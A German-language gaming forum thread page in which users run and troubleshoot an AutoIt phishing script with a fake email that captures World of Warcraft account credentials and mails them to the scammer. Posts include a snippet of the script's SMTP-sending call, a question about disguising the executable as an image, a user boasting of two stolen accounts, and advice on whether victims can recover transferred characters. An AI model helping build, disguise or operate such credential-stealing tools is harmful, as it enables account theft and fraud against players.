Register for your free account! | Forgot your password?

Go Back   elitepvpers > World of Warcraft > WoW Exploits, Hacks, Tools & Macros
You last visited: Today at 00:34

  • Please register to post and access all features, it's quick, easy and FREE!

 

Accountscam mit Autoit Script und Fakemail.

Closed Thread
 
Old   #136
 
elite*gold: 0
Join Date: Jan 2006
Posts: 387
Received Thanks: 23
Ich hab mir spaßes halber mal selber so ne Mail geschickt.... das war schon vor 1ner Stunde -.- Wie lange braucht es denn bis die Mail ankommt?



Kleiner Dodo is offline  
Old   #137
 
elite*gold: 0
Join Date: Dec 2007
Posts: 77
Received Thanks: 48
Hallo sordi, ich weiß nicht ob du dich damit auskennst, aber denkst du es wäre möglich, dass man die exe und das bild joined? Also Blizzard macht das ja mit seinen MPQ patches auch net anders, da ist die exe dann halt 800MB groß.. nur bei den installern gibts halt tomes..


Aziris is offline  
Old   #138
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Jaaah ich habs endlich zum laufen bekommen ^^ danke für die persönliche Hilfe Azi !!
Uffie is offline  
Old   #139
 
elite*gold: 0
Join Date: Apr 2005
Posts: 745
Received Thanks: 668
Quote:
Originally Posted by Aziris View Post
Hallo sordi, ich weiß nicht ob du dich damit auskennst, aber denkst du es wäre möglich, dass man die exe und das bild joined? Also Blizzard macht das ja mit seinen MPQ patches auch net anders, da ist die exe dann halt 800MB groß.. nur bei den installern gibts halt tomes..
Ich denke net das dass mit dem AutoIt Script geht, da das Bild aus nem Ordner eingebunden werden muss bei AutoIt. Außer es gäbe da ne andere Funktion für, aber ich kenne leider keine.


Sordi is offline  
Old   #140
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Habe seit gestern schon 2 accs bekommen !! Jetz ne frage...
Kann sich ein user seinen Charakter zurückholen wenn man ihn auf nen anderen account schaffen und umbenennen kann ?? habe alle erforderlichen infos aber bin mir da jetzt unsicher !!
Uffie is offline  
Old   #141
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
Quote:
Originally Posted by ReckoningBomb View Post



wtf?

brauch ich da outlook express oder so ?
hiho,
hab nun ma alles durchgelsen, aber komm zu keinem ergebniss. ich hab des selbe problem und keine ahnung wie das weg geht. liegt des an web oder so ?
Gink is offline  
Old   #142
 
elite*gold: 0
Join Date: Sep 2005
Posts: 5,077
Received Thanks: 419
Bei mir funzt alles, jedoch bekomm ich keine Daten die das Opfer eingibt
IncenD-RaveN is offline  
Old   #143
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Quote:
Originally Posted by Uffie View Post
Habe seit gestern schon 2 accs bekommen !! Jetz ne frage...
Kann sich ein user seinen Charakter zurückholen wenn man ihn auf nen anderen account schaffen und umbenennen kann ?? habe alle erforderlichen infos aber bin mir da jetzt unsicher !!
/push nich dass es auf der vorletzten Seite untergeht ...

@ Gink

Deine e-mail haste ohne <> eingegeben und beim compiliern kam keine Fehlermeldung ?? Ich hatte nämmich auch diese Meldung und ich habs nochma Compiliert und dann gings =/ ...
Uffie is offline  
Old   #144
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
hm... jetzt bekomm ich die andere fehlermeldung ¿

$rc = _INetSmtpMailCom("smtp.mail.yahoo.de", $Accountname, "", "", "WoWAccount", $Body, "", "", "", "Gink_Gink", "GinksPw", 25, 0)

damit funktionierts net. (hab natürlich andere e-mail daten)
Gink is offline  
Old   #145
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Mir web.de hatte ich auch Probleme ... Mach dir mal ne googlemail adresse, damit läufts einwandfrei bei mir jetzt !!
Uffie is offline  
Old   #146
 
elite*gold: 20
Join Date: Sep 2007
Posts: 609
Received Thanks: 148
das teil hört sich geil an, aber irgendwie hilft nix. selbst bei googlemail bekomm ich ne fehlermeldung.
Gink is offline  
Old   #147
 
elite*gold: 0
Join Date: Sep 2006
Posts: 2,704
Received Thanks: 249
Quote:
Originally Posted by Uffie View Post
Habe seit gestern schon 2 accs bekommen !! Jetz ne frage...
Kann sich ein user seinen Charakter zurückholen wenn man ihn auf nen anderen account schaffen und umbenennen kann ?? habe alle erforderlichen infos aber bin mir da jetzt unsicher !!
ja, umbennen ist sowieso sinnlos, da er ja nur den accnamen brauch auf den die chars kommen, wenn du vll von 1 nach 2 und von 2 nach 3 transt, aber das ist nicht nur teuer sondern kostet auch verdammt viel zeit.
Reckoning is offline  
Old   #148
 
elite*gold: 0
Join Date: Jan 2006
Posts: 387
Received Thanks: 23
Ich habe das problem, dass ich keine E-Mail mit dem WotLKBeta "Registration Tool" bekomme... wenn ich aber im Tool die Daten eingebe werden diese an meine eingetragene E-Mail Adresse geschickt (Arcor)->

Quote:
Originally Posted by psYcho aka. SLDZ View Post
Ich hab mir spaßes halber mal selber so ne Mail geschickt.... das war schon vor 1ner Stunde -.- Wie lange braucht es denn bis die Mail ankommt?
Kann mir da wer sagen an was das liegen könnte?
Kleiner Dodo is offline  
Old   #149
 
elite*gold: 0
Join Date: Feb 2008
Posts: 44
Received Thanks: 4
Quote:
Originally Posted by ReckoningBomb View Post
ja, umbennen ist sowieso sinnlos, da er ja nur den accnamen brauch auf den die chars kommen, wenn du vll von 1 nach 2 und von 2 nach 3 transt, aber das ist nicht nur teuer sondern kostet auch verdammt viel zeit.

Ehm heißt "Ja" jetzt dass er ihn sich zurückholen kann oder dass es funktioniert ?? Ich meine, wie will er ihn sich zurückholen wenn nur der nachname gleich bleibt aber vorname, mail, geheimfrage usw anders sind ??
Uffie is offline  
Old   #150
 
elite*gold: 0
Join Date: Sep 2006
Posts: 2,704
Received Thanks: 249
Also, das kann nun länger werden:

Nehmen wir mal an du hast einen Account gesammt.

Quote:
Vorname Alexander
Nachname: Mustermann

Login: hans123
PW: password1

IP: 1.1.1.1:1234
Das Sind die Infos Die Blizzard bekommt bei Login. ( Wobei der Nachname erst erst beim Cahrtransfer benötigt wird. )

So nun Loggst du dich ein ( Egal ob Accountverwaltung oder auf den Realms ) :

Quote:
Vorname Alexander
Nachname: Mustermann

Login: hans123
PW: password1

IP: 1.2.3.4:1231
Verstehst du worauf ich raus will ?

Wenn er behauptet der Account wurde gehackt, muss er nur 1 - 2 Wochen warten und er hat alles wieder.


Reckoning is offline  
Closed Thread



« Previous Thread | Next Thread »

Similar Threads
Accountscam mit Autoit Script und Fakemail...
Kann mir vllt. mal wer so ne e-mail schicken will wissen wie das so aussieht pls an : [email protected]
4 Replies - WoW Exploits, Hacks, Tools & Macros



All times are GMT +1. The time now is 00:34.


Powered by vBulletin®
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Abuse
Copyright ©2017 elitepvpers All Rights Reserved.